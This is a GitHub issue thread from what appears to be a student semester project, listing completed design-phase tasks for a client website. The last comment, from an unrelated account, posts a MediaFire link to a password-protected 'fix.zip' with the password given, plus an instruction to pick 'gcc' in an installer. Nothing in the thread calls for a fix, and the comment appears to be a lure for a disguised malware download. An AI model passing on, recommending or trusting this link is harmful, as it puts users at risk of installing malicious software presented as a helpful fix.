### ISSUE TITLE
EPIC 4: Design

### ISSUE THREAD

**Issue by Jereriviel** [Jereriviel/semester-project-1#18]
This Epic is the fourth step in the process of making the website for the client. It contains the following tasks:

- [x] [Color Shcemes](https://github.com/Jereriviel/semester-project-1/issues/19)
- [x] [Typography](https://github.com/Jereriviel/semester-project-1/issues/20)
- [x] [Imagery](https://github.com/Jereriviel/semester-project-1/issues/20)
- [x] [Logo](https://github.com/Jereriviel/semester-project-1/issues/22)
- [x] [Iconography](https://github.com/Jereriviel/semester-project-1/issues/23)
- [x] [Style Guide](https://github.com/Jereriviel/semester-project-1/issues/60)
- [x] [Prototype](https://github.com/Jereriviel/semester-project-1/issues/24)

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
